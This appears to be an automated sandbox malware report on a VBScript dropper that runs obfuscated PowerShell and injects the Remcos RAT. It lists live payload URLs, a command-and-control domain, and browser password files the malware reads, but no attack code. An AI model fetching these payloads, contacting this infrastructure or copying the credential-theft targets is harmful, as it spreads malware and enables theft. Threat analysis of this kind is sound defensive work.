            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ0\
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagersInfo
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0\
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager1
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:0\
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:0\cf
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, registros.dat.7.dr Binary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00434C52 cpuid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoA,7_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,7_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,7_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,7_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,7_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,7_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,7_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,7_2_00451F9B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00404F51 GetLocalTime,CreateEventA,CreateThread
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041B60D GetComputerNameExW,GetUserNameW,7_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_00449190
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

Source: Yara match | File source: 4.2.powershell.exe.1b0a055bad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a7dc0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a055bad0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a7dc0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2268054152.000001B09FD47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 7_2_0040BA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 7_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: \key3.db 7_2_0040BB30

            Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-XDNGQ0
Source: Yara match | File source: 4.2.powershell.exe.1b0a055bad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a7dc0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a055bad0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a7dc0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2268054152.000001B09FD47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: cmd.exe 7_2_0040569A
MITRE ATT&CK Matrix (listed per tactic; a number in front of a technique name is the count badge the report shows for that technique, unnumbered entries are the unmatched cells of the grid)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Native API; 1 Exploitation for Client Execution; 12 Command and Scripting Interpreter; 2 Service Execution; 3 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 221 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 222 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 222 Process Injection; HTML Smuggling; Dynamic API Resolution
Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 33 System Information Discovery; 21 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 211 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Web Service; 12 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1519309 | Sample: sostener.vbs | Start date: 26/09/2024 | Architecture: WINDOWS | Score: 100

Network nodes contacted: paste.ee (Connects to a pastebin service (likely for C&C)); newssssssssssssss.duckdns.org (Uses dynamic DNS services); ia600100.us.archive.org

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree (as drawn in the behavior graph):
wscript.exe 1 (started) - VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
  powershell.exe 7 (started) - Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading
    powershell.exe 14 15 (started) - contacts paste.ee 188.114.97.3, 443, 49712 CLOUDFLARENETUS European Union and ia600100.us.archive.org 207.241.227.240, 443, 49711 INTERNET-ARCHIVEUS United States; Writes to foreign memory regions; Injects a PE file into a foreign processes
      AddInProcess32.exe (started) - Contains functionality to bypass UAC (CMSTPLUA); Contains functionalty to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
      AddInProcess32.exe 3 2 (started) - contacts newssssssssssssss.duckdns.org 181.236.206.3, 2404, 49713, 49715 TELEBUCARAMANGASAESPCO Colombia; dropped C:\ProgramData\remcos\registros.dat, data; Detected Remcos RAT; Installs a global keyboard hook
      AddInProcess32.exe (started)
    conhost.exe (started)

Source | Detection | Scanner | Label | Link
sostener.vbs | 3% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe
http://paste.ee | 0% | Avira URL Cloud | safe
https://www.google.com; | 0% | Avira URL Cloud | safe
https://analytics.paste.ee | 0% | Avira URL Cloud | safe
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtc9I;k8fbase64Content | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://paste.ee | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://ia600100.us.arX | 0% | Avira URL Cloud | safe
https://oneget.org | 0% | URL Reputation | safe
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | 100% | Avira URL Cloud | malware
https://analytics.paste.ee; | 0% | Avira URL Cloud | safe
https://ia600100.us.archive.org | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com; | 0% | Avira URL Cloud | safe
https://paste.ee/d/WksSo/0 | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com | 0% | Avira URL Cloud | safe
newssssssssssssss.duckdns.org | 100% | Avira URL Cloud | malware
https://secure.gravatar.com | 0% | Avira URL Cloud | safe
http://ia600100.us.archive.org | 0% | Avira URL Cloud | safe
https://themes.googleusercontent.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ia600100.us.archive.org | 207.241.227.240 | true | false | | unknown
paste.ee | 188.114.97.3 | true | true | | unknown
newssssssssssssss.duckdns.org | 181.236.206.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | true | Avira URL Cloud: malware | unknown
https://paste.ee/d/WksSo/0 | true | Avira URL Cloud: safe | unknown
newssssssssssssss.duckdns.org | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://paste.ee | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000004.00000002.2253846406.000001B0907A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtc9I;k8fbase64Content | powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com; | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.arX | powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://analytics.paste.ee | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://paste.ee | powershell.exe, 00000004.00000002.2253846406.000001B08FB8D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | AddInProcess32.exe | false | URL Reputation: safe | unknown
https://www.google.com | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://analytics.paste.ee; | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia600100.us.archive.org | powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2311160926.000001FE9597A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2311160926.000001FE95994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com; | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2311160926.000001FE959C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.gravatar.com | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://themes.googleusercontent.com | powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ia600100.us.archive.org | powershell.exe, 00000004.00000002.2253846406.000001B090E2F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
181.236.206.3 | newssssssssssssss.duckdns.org | Colombia | 22368 | TELEBUCARAMANGASAESPCO | true
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1519309
                  Start date and time:2024-09-26 10:57:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 31s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:sostener.vbs
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winVBS@12/6@11/3
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 93%
                  • Number of executed functions: 47
                  • Number of non-executed functions: 195
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 2784 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 6784 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: sostener.vbs
Time | Type | Description
04:58:01 | API Interceptor | 42x Sleep call for process: powershell.exe modified
04:58:39 | API Interceptor | 2226230x Sleep call for process: AddInProcess32.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.97.3HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                  • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                  QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                  • filetransfer.io/data-package/Ky4pZ0WB/download
                  ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                  • www.1win-moldovia.fun/1g7m/
                  http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                  • www.tiktok758.com/img/logo.4c830710.svg
                  TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                  • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                  • www.rtprajalojago.live/2wnz/
                  (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                  • dddotx.shop/Mine/PWS/fre.php
                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                  • filetransfer.io/data-package/DiF66Hbf/download
                  http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                  • easyantrim.pages.dev/id.html
                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                  • filetransfer.io/data-package/13rSMZZi/download
                  207.241.227.240SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                    LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                      hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                          TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                            BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                              Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                  AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                    Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
newssssssssssssss.duckdns.org | sostener.vbs | malicious | Remcos, PureLog Stealer | 181.236.124.3
  | sostener.vbs | malicious | Remcos | 152.202.226.171
  | LisectAVT_2403002C_25.exe | malicious | Remcos | 152.202.253.94
  | 17205148126ac2da6bb98bfbbdf0e8548ffc9b1a78b4d8987ee78be9cae98ea22e5237be9b532.dat-decoded.exe | malicious | Remcos | 152.202.240.123
  | hovi2pkz3f.exe | malicious | Remcos | 172.94.54.167
paste.ee | hnvc.vbs | malicious | PureLog Stealer | 188.114.97.3
  | wm.vbs | malicious | PureLog Stealer, XWorm | 188.114.96.3
  | Zoom_Invite.call-660194855683.wsf | malicious | XWorm | 188.114.97.3
  | reported_account_violation-pdf-67223451.wsf | malicious | XWorm | 188.114.97.3
  | New_Document-660128863990.wsf | malicious | Unknown | 188.114.96.3
  | New_Document-660119928827.wsf | malicious | Unknown | 188.114.97.3
  | New_Document-0706282.js | malicious | Unknown | 188.114.96.3
  | New_Document-0706282.js | malicious | Unknown | 188.114.97.3
  | asd.wsf | malicious | XWorm | 188.114.97.3
  | Commitment_for_Title_Insurance-660184790411.wsf | malicious | XWorm | 188.114.97.3
ia600100.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
  | hnvc.vbs | malicious | PureLog Stealer | 207.241.227.240
  | wm.vbs | malicious | PureLog Stealer, XWorm | 207.241.227.240
  | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | Order draft.vbs | malicious | Azorult, PureLog Stealer | 207.241.227.240
  | SPEC.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://cantanero.pro/ | malicious | HTMLPhisher | 172.67.181.118
  | HPDeskJet_043_SCAN.pdf | malicious | Phisher | 188.114.96.3
  | SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
  | CMR_7649.EXE.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
